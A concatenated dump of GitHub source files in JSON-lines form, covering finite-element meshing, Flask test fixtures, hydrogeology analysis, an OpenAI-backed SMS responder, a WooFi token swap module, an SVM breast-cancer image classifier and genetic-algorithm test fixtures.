5\n\n geom.characteristic_length_max = mesh_size\n beam = geom.add_line(\n geom.add_point((0, 0, 0), mesh_size=mesh_size),\n geom.add_point((length, 0, 0), mesh_size=mesh_size),\n )\n\n geom.add_physical(beam, \"beam\")\n # geom.add_physical(beam.points[0], \"left_bc\")\n # geom.add_physical(beam.points[1], \"right_bc\")\n\n # geom.set_transfinite_curve(beam, 10, \"Progression\", 1)\n mesh = geom.generate_mesh()\n print(mesh)\n # Save mesh in a vtk file\n file_vtk = \"./salome/beam1d.vtk\"\n mesh.write(file_vtk)\n file_med = \"./salome/beam1d.med\"\n mesh.write(file_med)\n\n # Plot\n grid = pv.read(file_vtk)\n grid.plot(show_axes=True, show_edges=True)\n\n","repo_name":"daalgi/fem-scripts","sub_path":"salome/beam1d.py","file_name":"beam1d.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1325090730","text":"import os\nimport tempfile\n\nimport pytest\nfrom flask import template_rendered\n\nfrom recepies import create_app\n\n@pytest.fixture\ndef app():\n db_fd, db_path = tempfile.mkstemp()\n app = create_app({\"TESTING\": True, \"DATABASE\": db_path})\n \n yield app\n\n os.close(db_fd)\n os.unlink(db_path)\n\n@pytest.fixture\ndef client(app):\n return app.test_client()\n\n@pytest.fixture\ndef runner(app):\n return app.test_cli_runner()\n\n@pytest.fixture\ndef captured_templates(app):\n recorded = []\n\n def record(sender, template, context, **extra):\n recorded.append((template, context))\n\n template_rendered.connect(record, app)\n try:\n yield recorded\n finally:\n template_rendered.disconnect(record, app)\n\n","repo_name":"iamnotgabriel/recepie-book","sub_path":"test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34416558695","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nimport hydrogeosines as hgs\n\n#%% test the model\nhgs = hgs.site('TEST', geoloc=[141.762065, -31.065781, 160])\n\nhgs.data.import_csv('test_data/fowlers_gap/acworth_short.csv', dt_fmt='%d/%m/%Y %H:%M')\nprint(hgs.data.all)\n\ntimefloat = hgs.data.tf.values\ndata = hgs.data.all['{BP}'].values\ndata1, result1 = hgs.method.lin_window_ovrlp(timefloat, data)\ndata2, result2 = hgs.method.hals(timefloat, data1, freqs='AT')\n\n#%%\nfig, axs = plt.subplots(2)\nfig.suptitle('HALS Estimation')\n\naxs[0].plot(hgs.data.all.index.values, data - np.nanmean(data))\naxs[0].plot(hgs.data.all.index.values, data1)\naxs[0].plot(hgs.data.all.index.values, data2)\n\naxs[1].plot(np.angle(result2['comp']), np.abs(result2['comp']), '.r')\naxs[1].set_xlim([-np.pi, np.pi])\n\n#%% \n# heads = hgs.data.correct_heads(locs=['Smith'])\n# heads = hgs.data.correct_heads()\n# print(heads)\n\n# #%%\n# # new_t = pd.date_range(start='2014-10-21 00:00', end='2016-05-18 05:15', freq='15min').to_series()\n# # new_t.to_csv('time.csv')\n\n#%%\nbe = hgs.data.calc_BE(method='acworth')\nprint(be)\n\nbe = hgs.data.calc_BE(method='rau')\nprint(be)\n","repo_name":"HydroGeoSines/HydroGeoSines","sub_path":"tests/acworth_v0.py","file_name":"acworth_v0.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"78"} +{"seq_id":"71619227133","text":"import openai as op\nimport os\nimport re\nimport random\nfrom datetime import datetime, timedelta\nimport random\nimport time\n\n#examples puller\nfrom langchain.embeddings import OpenAIEmbeddings\nfrom langchain.vectorstores import FAISS\nfrom langchain.document_loaders import TextLoader\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\n\ndef find_txt_examples(query, k=8):\n loader = TextLoader(\"sops.txt\")\n documents = loader.load()\n text_splitter = RecursiveCharacterTextSplitter(chunk_size=600, chunk_overlap=50, length_function = len, is_separator_regex = False)\n docs = text_splitter.split_documents(documents)\n for doc in docs:\n print(len(str(doc)))\n embeddings = OpenAIEmbeddings()\n\n db = FAISS.from_documents(docs, embeddings)\n docs = db.similarity_search(query, k=k)\n\n examples = \"\"\n i = 1\n for doc in docs:\n examples += f'\\n\\nSNIPPET {i}' + doc.page_content\n i+=1\n return examples\n\n\n#generate openai response; returns messages with openai response\ndef ideator(messages, lead_dict_info):\n#\n prompt = messages[0]['content']\n messages = messages[1:]\n new_message = messages[-1]['content']\n\n #perform similarity search\n examples = find_txt_examples(new_message, k=5)\n \n prompt = prompt + examples\n prompt = prompt.format(**lead_dict_info)\n #print('inbound message: ' + str(messages[-1]))\n #print('prompt' + prompt)\n #print('\\n\\n')\n prompt = {'role': 'system', 'content': prompt}\n messages.insert(0,prompt)\n \n for message in messages:\n print(message)\n for i in range(5):\n try:\n key = os.environ.get(\"OPENAI_API_KEY\")\n op.api_key = key\n \n result = op.ChatCompletion.create(\n model=\"gpt-4\",\n messages= messages,\n max_tokens = 500,\n temperature = 0\n )\n response = result[\"choices\"][0][\"message\"][\"content\"]\n #print('response:')\n #print(response)\n #print('\\n\\n')\n break\n except Exception as e: \n error_message = f\"Attempt {i + 1} failed: {e}\"\n #print(error_message)\n if i < 4: # we don't want to wait after the last try\n time.sleep(5) # wait for 5 seconds before the next attempt\n \n def split_sms(message):\n import re\n \n # Use regular expressions to split the string at ., !, or ? followed by a space or newline\n sentences = re.split('(?<=[.!?]) (?=\\\\S)|(?<=[.!?])\\n', message.strip())\n # Strip leading and trailing whitespace from each sentence\n sentences = [sentence.strip() for sentence in sentences if sentence.strip()]\n \n # Compute the cumulative length of all sentences\n cum_length = [0]\n for sentence in sentences:\n cum_length.append(cum_length[-1] + len(sentence))\n \n total_length = cum_length[-1]\n \n # Find the splitting point\n split_point = next(i for i, cum_len in enumerate(cum_length) if cum_len >= total_length / 2)\n \n # Split the sentences into two parts at the splitting point\n part1 = sentences[:split_point]\n part2 = sentences[split_point:]\n \n # Join the sentences in each part back into strings and exclude any part that is empty\n strings = []\n if part1:\n strings.append(\" \".join(part1))\n if part2:\n strings.append(\" \".join(part2))\n \n return strings\n\n response = add_space_after_url(response)\n split_response = split_sms(response)\n count = len(split_response)\n for section in split_response:\n section = add_space_after_url(section)\n section = {\n \"role\": \"assistant\", \n \"content\": section\n }\n messages.append(section)\n \n return messages, count\n \n\ndef add_space_after_url(s):\n words = s.split()\n for i, word in enumerate(words):\n if word.startswith('http://') or word.startswith('https://'):\n if word[-1] in '.,!?;:':\n words[i] = word[:-1] + ' ' + word[-1] + ' '\n else:\n words[i] = word + ' '\n return ' '.join(words)\n\n\ndef create_produce_link_url(buyer_or_supplier, inputs):\n to_append = ''\n for input in inputs:\n to_append += f'&commodity{inputs}'\n\n base = 'https://app.fullharvest.com/listings?anonymous=true'\n search_produce_link = base + to_append\n\n return search_produce_link\n\n\n \n\n ","repo_name":"uqarni/fullharvest-demo","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25118780891","text":"#!/usr/bin/env python\n\nimport numpy\nfrom scipy import fftpack\n\ndef array_delay(a1, a2):\n l = len(a1)\n if l != len(a2): raise(Exception(\"rfvale\"))\n # We fill with zeros to can detect if we need +t or -t\n a1 = numpy.append(a1, a1*0)\n a2 = numpy.append(a2, a2*0)\n r = len(a1) - len(a2)\n if r > 0:\n a2 = numpy.append(a2, a1[0:r])\n elif r < 0:\n a1 = numpy.append(a1, a2[0:-r])\n a1 = fftpack.fft(a1, axis=0)\n a2 = fftpack.fft(a2, axis=0)\n # FFT convolution\n c1 = numpy.argmax(numpy.abs(fftpack.ifft(-a1.conjugate()*a2, axis=0))) #delay a1 + shift = a2\n # Be careful, this is a circular convolution, we always delay the minimum range possible\n # because we are calculating a sample of the audio, not fully\n return (c1 if c1 <= l else c1 - l*2)\n\ndef text_delay(forig, fpost, maxdelay = 2000):\n dorig = how_text(forig)\n dorig.sort()\n dpost = how_text(fpost)\n dpost.sort()\n diff = dorig[0].start - dpost[0].start\n if abs(diff) > maxdelay:\n print(\"Right File:\")\n for i in range(0, 20):\n print(\"{} - {}\".format(i, dorig[i].text.encode(\"utf-8\")))\n print(\"\\nDelayed File:\")\n for i in range(0, 20):\n print(\"{} - {}\".format(i, dpost[i].text.encode(\"utf-8\")))\n i1 = int(input('Line for right file:'))\n i2 = int(input('Line for delayed file:'))\n return dorig[i2].start - dpost[i1].start\n\n","repo_name":"latot/SubsWorker","sub_path":"SubsWorker/Delay.py","file_name":"Delay.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33769075687","text":"from loguru import logger\nfrom web3 import Web3\nfrom config import WOOFI_CONTRACTS, WOOFI_ROUTER_ABI, BASE_TOKENS\nfrom .account import Account\n\n\nclass WooFi(Account):\n def __init__(self, account_id: int, private_key: str) -> None:\n super().__init__(account_id=account_id, private_key=private_key, chain=\"base\")\n\n self.swap_contract = self.get_contract(WOOFI_CONTRACTS[\"router\"], WOOFI_ROUTER_ABI)\n\n self.tx = {\n \"from\": self.address,\n \"gasPrice\": self.w3.eth.gas_price,\n \"nonce\": self.w3.eth.get_transaction_count(self.address)\n }\n\n def get_min_amount_out(self, from_token: str, to_token: str, amount: int, slippage: float):\n min_amount_out = self.swap_contract.functions.querySwap(\n Web3.to_checksum_address(from_token),\n Web3.to_checksum_address(to_token),\n amount\n ).call()\n return int(min_amount_out - (min_amount_out / 100 * slippage))\n\n def swap(\n self,\n from_token: str,\n to_token: str,\n min_amount: float,\n max_amount: float,\n decimal: int,\n slippage: int,\n all_amount: bool,\n min_percent: int,\n max_percent: int\n ):\n amount_wei, amount, balance = self.get_amount(\n from_token,\n min_amount,\n max_amount,\n decimal,\n all_amount,\n min_percent,\n max_percent\n )\n\n logger.info(\n f\"[{self.account_id}][{self.address}] Swap on WooFi – {from_token} -> {to_token} | {amount} {from_token}\"\n )\n\n try:\n if from_token == \"ETH\":\n from_token_address = \"0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE\"\n to_token_address = Web3.to_checksum_address(BASE_TOKENS[to_token])\n self.tx.update({\"value\": amount_wei})\n else:\n from_token_address = Web3.to_checksum_address(BASE_TOKENS[from_token])\n to_token_address = \"0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE\"\n\n self.approve(amount_wei, from_token_address, WOOFI_CONTRACTS[\"router\"])\n self.tx.update({\"nonce\": self.w3.eth.get_transaction_count(self.address)})\n\n min_amount_out = self.get_min_amount_out(from_token_address, to_token_address, amount_wei, slippage)\n\n contract_txn = self.swap_contract.functions.swap(\n from_token_address,\n to_token_address,\n amount_wei,\n min_amount_out,\n self.address,\n self.address\n ).build_transaction(self.tx)\n\n signed_txn = self.sign(contract_txn)\n\n txn_hash = self.send_raw_transaction(signed_txn)\n\n self.wait_until_tx_finished(txn_hash.hex())\n except Exception as e:\n logger.error(f\"[{self.account_id}][{self.address}] Error | {e}\")\n","repo_name":"Samogonshikua/BASE.","sub_path":"modules/woofi.py","file_name":"woofi.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"1577200155","text":"import pickle\n# from msilib.schema import Error\nfrom pickle import PickleError\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\n\nimport sys\nimport getopt\nimport pandas as pd\nimport os\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\n\nfrom os import listdir\nfrom skimage.transform import resize\nfrom skimage.io import imread\nfrom PIL import Image\nfrom matplotlib.pyplot import imread\nfrom skimage.io import imread\nfrom sklearn import svm\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\n\n\nFILE_DIR = os.listdir(\"/Users/owenwebb/E90_data/archive-2/IDC_regular_ps50_idx5/\")\nBASE_PATH = \"/Users/owenwebb/E90_data/archive-2/IDC_regular_ps50_idx5/\"\nPICKLE_PATH = \"/Users/owenwebb/E90_data/\"\nFOLDER = os.listdir(BASE_PATH)\n\n\"\"\"\nDEFINITION: \n\"\"\"\n# Will extract x and y coordinates from the path to file\ndef extract_coords(df):\n coord = df.path.str.rsplit(\"_\", n=4, expand=True)\n coord = coord.drop([0, 1, 4], axis=1)\n coord = coord.rename({2: \"x\", 3: \"y\"}, axis=1)\n coord.loc[:, \"x\"] = coord.loc[:,\"x\"].str.replace(\"x\", \"\", case=False).astype(np.int)\n coord.loc[:, \"y\"] = coord.loc[:,\"y\"].str.replace(\"y\", \"\", case=False).astype(np.int)\n df.loc[:, \"x\"] = coord.x.values\n df.loc[:, \"y\"] = coord.y.values\n return df\n\n\"\"\"\nDEFINITION: \n\"\"\"\n# creates a new dataframe for each patient\ndef get_cancer_dataframe(patient_id, cancer_id):\n path = BASE_PATH + patient_id + \"/\" + cancer_id\n files = listdir(path)\n dataframe = pd.DataFrame(files, columns=[\"filename\"])\n path_names = path + \"/\" + dataframe.filename.values\n dataframe = dataframe.filename.str.rsplit(\"_\", n=4, expand=True)\n dataframe.loc[:, \"target\"] = np.int(cancer_id)\n dataframe.loc[:, \"path\"] = path_names\n dataframe = dataframe.drop([0, 1, 4], axis=1)\n dataframe = dataframe.rename({2: \"x\", 3: \"y\"}, axis=1)\n dataframe.loc[:, \"x\"] = dataframe.loc[:,\"x\"].str.replace(\"x\", \"\", case=False).astype(np.int)\n dataframe.loc[:, \"y\"] = dataframe.loc[:,\"y\"].str.replace(\"y\", \"\", case=False).astype(np.int)\n return dataframe\n\n\"\"\"\nDEFINITION: \n\"\"\"\n# Simply calls for certain patient for positive and negative\ndef get_patient_dataframe(patient_id):\n df_0 = get_cancer_dataframe(patient_id, \"0\")\n df_1 = get_cancer_dataframe(patient_id, \"1\")\n patient_df = df_0.append(df_1)\n return patient_df\n\n\"\"\"\nDEFINITION: \n\"\"\"\n# simply combines all of one patient to print image and overlay of where cancer is\ndef visualise_breast_tissue(patient_id, pred_df=None):\n example_df = get_patient_dataframe(patient_id)\n max_point = [example_df.y.max()-1, example_df.x.max()-1]\n grid = 255*np.ones(shape = (max_point[0] + 50, max_point[1] + 50, 3)).astype(np.uint8)\n mask = 255*np.ones(shape = (max_point[0] + 50, max_point[1] + 50, 3)).astype(np.uint8)\n if pred_df is not None:\n patient_df = pred_df[pred_df.patient_id == patient_id].copy()\n mask_proba = np.zeros(shape = (max_point[0] + 50, max_point[1] + 50, 1)).astype(np.float)\n \n broken_patches = []\n for n in range(len(example_df)):\n try:\n image = imread(example_df.path.values[n])\n \n target = example_df.target.values[n]\n \n x_coord = np.int(example_df.x.values[n])\n y_coord = np.int(example_df.y.values[n])\n x_start = x_coord - 1\n y_start = y_coord - 1\n x_end = x_start + 50\n y_end = y_start + 50\n\n grid[y_start:y_end, x_start:x_end] = image\n if target == 1:\n mask[y_start:y_end, x_start:x_end, 0] = 250\n mask[y_start:y_end, x_start:x_end, 1] = 0\n mask[y_start:y_end, x_start:x_end, 2] = 0\n if pred_df is not None:\n \n proba = patient_df[\n (patient_df.x==x_coord) & (patient_df.y==y_coord)].proba\n mask_proba[y_start:y_end, x_start:x_end, 0] = np.float(proba)\n\n except ValueError:\n broken_patches.append(example_df.path.values[n])\n \n \n return grid, mask, broken_patches, mask_proba\n\n\"\"\"\nDEFINITION: \n\"\"\"\n# Load the image data into the dataframes\ndef load_dataframes_from_raw_save_as_pickle(filename):\n target_arr=[]\n # datadir='/Users/owenwebb/E90_data/archive-2/IDC_regular_ps50_idx5'\n patient_id_arr = []\n path_arr = []\n\n for n in range(len(FOLDER)):\n patient_id = FOLDER[n]\n patient_path = BASE_PATH + patient_id \n for c in [0,1]:\n class_path = patient_path + \"/\" + str(c) + \"/\"\n subfiles = os.listdir(class_path)\n for img in range(len(subfiles)):\n image_path = subfiles[img]\n complete_path = os.path.join(class_path,image_path)\n target_arr.append(c)\n patient_id_arr.append(patient_id)\n path_arr.append(complete_path)\n \n target=np.array(target_arr)\n patient_id_np = np.array(patient_id_arr)\n path_arr_np = np.array(path_arr)\n data=pd.DataFrame()\n data[\"target\"]=target\n data[\"patient_id\"] = patient_id_np\n data[\"path\"] = path_arr_np\n\n data.to_pickle(filename)\n\n return data\n\n\"\"\"\nDEFINITION: \n\"\"\"\n# Counts the total images in the files\ndef print_num_images():\n total_images = 0\n for n in range(len(FOLDER)):\n patient_id = FOLDER[n]\n for c in [0, 1]:\n patient_path = BASE_PATH + patient_id \n class_path = patient_path + \"/\" + str(c) + \"/\"\n subfiles = os.listdir(class_path)\n total_images += len(subfiles)\n \n print(\"total number of images = %d\" %total_images)\n return\n\n\"\"\"\nDEFINITION: \n\"\"\"\n# Plot the histogram fequencies for patients\ndef plot_hist_frequencies(data):\n cancer_perc = data.groupby(\"patient_id\").target.value_counts()/ data.groupby(\"patient_id\").target.size()\n cancer_perc = cancer_perc.unstack()\n _, ax = plt.subplots(1,3,figsize=(20,5))\n sns.distplot(data.groupby(\"patient_id\").size(), ax=ax[0], color=\"Orange\", kde=False, bins=30)\n ax[0].set_xlabel(\"Number of patches\")\n ax[0].set_ylabel(\"Frequency\")\n ax[0].set_title(\"How many patches do we have per patient?\")\n sns.distplot(cancer_perc.loc[:, 1]*100, ax=ax[1], color=\"Tomato\", kde=False, bins=30)\n ax[1].set_title(\"How much percentage of an image is covered by IDC?\")\n ax[1].set_ylabel(\"Frequency\")\n ax[1].set_xlabel(\"'%' of patches with IDC\")\n sns.countplot(data.target, palette=\"Set2\", ax=ax[2])\n ax[2].set_xlabel(\"no(0) versus yes(1)\")\n ax[2].set_title(\"How many patches show IDC?\")\n return \n\n\"\"\"\nDEFINITION: \n\"\"\"\ndef plot_pos_selection(data):\n pos_selection = np.random.choice(data[data.target==1].index.values, size=50, replace=False)\n fig, ax = plt.subplots(5,10,figsize=(20,10))\n\n for n in range(5):\n for m in range(10):\n idx = pos_selection[m + 10*n]\n image = imread(data.loc[idx, \"path\"])\n ax[n,m].imshow(image)\n ax[n,m].grid(False)\n return\n\n\"\"\"\nDEFINITION: \n\"\"\"\ndef plot_neg_selection(data):\n neg_selection = np.random.choice(data[data.target==0].index.values, size=50, replace=False)\n fig, ax = plt.subplots(5,10,figsize=(20,10))\n\n for n in range(5):\n for m in range(10):\n idx = neg_selection[m + 10*n]\n image = imread(data.loc[idx, \"path\"])\n ax[n,m].imshow(image)\n ax[n,m].grid(False)\n return\n\n\"\"\"\nDEFINITION: \n\"\"\"\ndef plot_x_y_values(data):\n # Will get an examle dataframe for the first patient\n example = get_patient_dataframe(data.patient_id.values[0])\n # example.head()\n\n _, ax = plt.subplots(5,3,figsize=(20, 27))\n\n patient_ids = data.patient_id.unique()\n\n # will print out 15 patient values to establish x and y importance\n for n in range(5):\n for m in range(3):\n patient_id = patient_ids[m + 3*n]\n example_df = get_patient_dataframe(patient_id)\n \n ax[n,m].scatter(example_df.x.values, example_df.y.values, c=example_df.target.values, cmap=\"coolwarm\", s=20);\n ax[n,m].set_title(\"patient \" + patient_id)\n ax[n,m].set_xlabel(\"y coord\")\n ax[n,m].set_ylabel(\"x coord\")\n return\n\n\"\"\"\nDEFINITION: \n\"\"\"\ndef visualize_one_example():\n example = \"13616\"\n grid, mask, broken_patches,_ = visualise_breast_tissue(example)\n\n _, ax = plt.subplots(1,2,figsize=(20,10))\n ax[0].imshow(grid, alpha=0.9)\n ax[1].imshow(mask, alpha=0.8)\n ax[1].imshow(grid, alpha=0.7)\n ax[0].grid(False)\n ax[1].grid(False)\n for m in range(2):\n ax[m].set_xlabel(\"y-coord\")\n ax[m].set_ylabel(\"y-coord\")\n ax[0].set_title(\"Breast tissue slice of patient: \" + example)\n ax[1].set_title(\"Cancer tissue colored red \\n of patient: \" + example)\n return\n\n\"\"\"\nDEFINITION: \n\"\"\"\ndef flatten_image_and_new_df(data, filename):\n start = time.time()\n flat_data_arr = []\n\n for img_path in data.path:\n img_array=imread(img_path)\n img_resized=resize(img_array,(50,50,3))\n flat_data_arr.append(img_resized.flatten())\n\n flat_data=np.array(flat_data_arr, dtype=np.float)\n\n end = time.time()\n print(\"create flat data = %f\" %(end-start))\n\n data = extract_coords(data)\n \n # creates a dataframe that contains the images as rows with features at columns\n df = pd.DataFrame(flat_data)\n df[\"target\"] = data[\"target\"]\n df[\"patient_id\"] = data[\"patient_id\"]\n df[\"x\"] = data[\"x\"]\n df[\"y\"] = data[\"y\"]\n\n df.to_pickle(filename)\n return df\n\ndef plot_train_test_dev(train_df, dev_df, test_df):\n _, ax = plt.subplots(1,3,figsize=(20,5))\n sns.countplot(train_df.target, ax=ax[0], palette=\"Reds\")\n ax[0].set_title(\"Train data\")\n sns.countplot(dev_df.target, ax=ax[1], palette=\"Blues\")\n ax[1].set_title(\"Dev data\")\n sns.countplot(test_df.target, ax=ax[2], palette=\"Greens\")\n ax[2].set_title(\"Test data\")\n\n\n\"\"\"\nDEFINITION: \n\"\"\"\ndef main(argv):\n load_imgs = False\n load_original_df = False\n plots = False\n try:\n opts, args = getopt.getopt(argv,\"hiop\",[])\n except getopt.GetoptError:\n print (\"svm_image_cancer_code.py -i -o\\n\\\n -i = load all the images again\\n\\\n -o = load the original dataframe\\n\\\n -p = plot the images\")\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print (\"svm_image_cancer_code.py -i -o\\n\\\n -i = load all the images again\\n\\\n -o = load the original dataframe\\n\\\n -p = plot the images\")\n sys.exit()\n elif opt in (\"-i\", \"--images\"):\n load_imgs = True\n elif opt in (\"-o\", \"--originaldf\"):\n load_original_df = True\n elif opt in (\"-p\", \"--plots\"):\n plots = True\n\n print_num_images()\n\n pickle_file = os.path.join(PICKLE_PATH, \"data_no_image.pkl\")\n # load_data.py file\n \n if load_original_df:\n print(\"Begining to Load Original Dataframe\")\n data = load_dataframes_from_raw_save_as_pickle(pickle_file)\n print(\"Done Loading Original Dataframe\")\n else:\n try:\n print(\"Attempting to read from %s\" %(pickle_file))\n data = pd.read_pickle(pickle_file)\n print(\"Successfully Read Original Dataframe From Pickle File\")\n except Exception:\n print(\"ERROR: cannot read pickle file. Need to load in original dataframe file\")\n exit(2)\n if plots:\n print(\"Plots Are On\")\n plot_hist_frequencies(data)\n plot_pos_selection(data) \n plot_neg_selection(data)\n plot_x_y_values(data)\n visualize_one_example()\n\n # convert to make data more compressed\n data[\"patient_id\"] = data[\"patient_id\"].astype(int)\n data[\"target\"] = data[\"target\"].astype(int)\n\n\n img_pickle_file = os.path.join(PICKLE_PATH, \"img_pickle_file.pkl\")\n if load_imgs:\n print(\"Begining to Load Images Dataframe\")\n start = time.time()\n df = flatten_image_and_new_df(data, img_pickle_file)\n end = time.time()\n print(\"Done Loading Images Dataframe. Took %ds\" %(end-start))\n else:\n try:\n print(\"Attempting to read from %s\" %(img_pickle_file))\n df = pd.read_pickle(img_pickle_file)\n print(\"Successfully Read Image Dataframe From Pickle File\")\n except Exception:\n print(\"ERROR: cannot read pickle file. Need to load in image dataframe file\")\n exit(2)\n\n\n # split based on patient_id, so that we can train on all the x and y's\n patients = data.patient_id.unique()\n\n train_ids, sub_test_ids = train_test_split(patients,\n test_size=0.3,\n random_state=0)\n test_ids, dev_ids = train_test_split(sub_test_ids, test_size=0.5, random_state=0)\n\n # divy up the data into a train, test, and dev dataframes\n start = time.time()\n train_df = df.loc[data.patient_id.isin(train_ids),:]\n test_df = df.loc[data.patient_id.isin(test_ids),:]\n dev_df = df.loc[data.patient_id.isin(dev_ids),:]\n end = time.time()\n \n print(\"time: %f\" %(end-start))\n if plots:\n plot_train_test_dev(train_df, dev_df, test_df)\n\n # param_grid={'C':[0.1,1,10,100],'gamma':[0.0001,0.001,0.1,1],'kernel':['rbf','poly']}\n\n svc=svm.SVC(probability=True)\n\n # model=GridSearchCV(svc,param_grid,scoring='accuracy')\n\n print(\"Starting SVC Training\")\n svc.fit(train_df[train_df.columns.difference([\"target\",\"patient_id\"])], train_df.target)\n print(\"Finished SVC Training\")\n\n # histogram of the features\n # histogram of the positive and negative\n # PCA could reduce \n # luminance and chromanance\n # 8-bit pixel depth vs np.float\n\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"owebb1/cancerous-image-classifier","sub_path":"src/svm_image_cancer_code.py","file_name":"svm_image_cancer_code.py","file_ext":"py","file_size_in_byte":14040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10008273409","text":"\n# Standard library\nfrom typing import List\nfrom unittest import mock\n\n# 3rd party packages\nimport pytest\n\n# Local source\nfrom parametrization_clean.domain.individual import Individual\nfrom parametrization_clean.domain.selection.tournament import TournamentSelect\nfrom parametrization_clean.domain.mutation.gauss import GaussianMutate\nfrom parametrization_clean.domain.crossover.double_pareto import DoubleParetoCross\nfrom parametrization_clean.domain.adaptation.xiao import XiaoAdapt\nfrom parametrization_clean.use_case.population_propagator import PopulationPropagator\nfrom parametrization_clean.domain.root_individual import RootIndividual\nfrom parametrization_clean.use_case.port.population_repository import IPopulationRepository\nfrom tests.fixtures.domain import dft_energies, weights, root_ffield, param_keys\n\n\n@pytest.fixture()\n@pytest.mark.usefixtures('dft_energies', 'weights', 'root_ffield', 'param_keys')\ndef root_individual(dft_energies, weights, root_ffield, param_keys):\n root_individual = RootIndividual(dft_energies, weights, root_ffield, param_keys)\n return root_individual\n\n\n@pytest.fixture()\ndef population_repository(root_individual):\n class TestPopulationRepository(IPopulationRepository):\n def get_root_individual(self) -> RootIndividual:\n return root_individual\n\n def get_population(self, generation_number: int) -> List[Individual]:\n pass\n\n def get_previous_n_populations(self, num_populations: int) -> List[Individual]:\n pass\n\n def write_individual(self, individual: Individual, **kwargs):\n pass\n\n def write_population(self, population: List[Individual], generation_number):\n pass\n\n return TestPopulationRepository()\n\n\n@pytest.fixture()\n@mock.patch('parametrization_clean.use_case.port.settings_repository.IAllSettings')\n@pytest.mark.usefixtures('param_bounds')\ndef all_settings(all_settings_mock, param_bounds):\n all_settings_mock.strategy_settings.selection_strategy = TournamentSelect\n all_settings_mock.strategy_settings.mutation_strategy = GaussianMutate\n all_settings_mock.strategy_settings.crossover_strategy = DoubleParetoCross\n all_settings_mock.strategy_settings.adaptation_strategy = XiaoAdapt\n\n all_settings_mock.ga_settings.population_size = 4\n all_settings_mock.ga_settings.mutation_rate = 0.20\n all_settings_mock.ga_settings.crossover_rate = 0.80\n all_settings_mock.ga_settings.use_elitism = True\n all_settings_mock.ga_settings.use_adaptation = False\n all_settings_mock.ga_settings.use_neural_network = False\n\n all_settings_mock.mutation_settings.gauss_std = [0.10]\n all_settings_mock.mutation_settings.gauss_frac = [1.0]\n all_settings_mock.mutation_settings.nakata_rand_lower = -1.0\n all_settings_mock.mutation_settings.nakata_rand_higher = 1.0\n all_settings_mock.mutation_settings.nakata_scale = 0.10\n all_settings_mock.mutation_settings.polynomial_eta = 60\n all_settings_mock.mutation_settings.param_bounds = param_bounds\n\n all_settings_mock.crossover_settings.dpx_alpha = 10\n all_settings_mock.crossover_settings.dpx_beta = 1\n\n all_settings_mock.selection_settings.tournament_size = 2\n\n all_settings_mock.adaptation_settings.srinivas_k1 = 1.0\n all_settings_mock.adaptation_settings.srinivas_k2 = 0.5\n all_settings_mock.adaptation_settings.srinivas_k3 = 1.0\n all_settings_mock.adaptation_settings.srinivas_k4 = 0.5\n all_settings_mock.adaptation_settings.srinivas_default_mutation_rate = 0.005\n all_settings_mock.adaptation_settings.xiao_min_crossover_rate = 0.4\n all_settings_mock.adaptation_settings.xiao_min_mutation_rate = 0.1\n all_settings_mock.adaptation_settings.xiao_scale = 0.4\n\n return all_settings_mock\n\n\n@mock.patch('parametrization_clean.use_case.port.population_repository.IPopulationRepository')\ndef test_population_propagator_init(population_repository_mock, all_settings):\n population_repository_mock.get_root_individual = mock.MagicMock(return_value=root_individual)\n\n propagator = PopulationPropagator(all_settings, population_repository_mock)\n\n assert propagator.ga_settings.population_size == 4\n assert propagator.ga_settings.mutation_rate == 0.20\n assert propagator.ga_settings.crossover_rate == 0.80\n assert propagator.ga_settings.use_elitism\n assert not propagator.ga_settings.use_adaptation\n assert not propagator.ga_settings.use_neural_network\n\n assert propagator.crossover_rate == 0.80\n assert propagator.mutation_rates == [0.20, 0.20]\n\n assert propagator.mutation_strategy == all_settings.strategy_settings.mutation_strategy\n assert propagator.crossover_strategy == all_settings.strategy_settings.crossover_strategy\n assert propagator.selection_strategy == all_settings.strategy_settings.selection_strategy\n\n assert propagator.mutation_settings_dict['gauss_std'] == [0.10]\n assert propagator.mutation_settings_dict['gauss_frac'] == [1.0]\n assert propagator.mutation_settings_dict['nakata_rand_lower'] == -1.0\n assert propagator.mutation_settings_dict['nakata_rand_higher'] == 1.0\n assert propagator.mutation_settings_dict['nakata_scale'] == 0.10\n assert propagator.mutation_settings_dict['polynomial_eta'] == 60\n assert propagator.mutation_settings_dict['param_bounds'] == [[0.0, 2.0],\n [0.0, 0.5],\n [-1.0, 0.0],\n [3.0, 12.0],\n [1.0, 3.0]]\n\n assert propagator.crossover_settings_dict['dpx_alpha'] == 10\n assert propagator.crossover_settings_dict['dpx_beta'] == 1\n\n assert propagator.selection_settings_dict['tournament_size'] == 2\n\n assert propagator.adaptation_settings_dict['srinivas_k1'] == 1.0\n assert propagator.adaptation_settings_dict['srinivas_k2'] == 0.5\n assert propagator.adaptation_settings_dict['srinivas_k3'] == 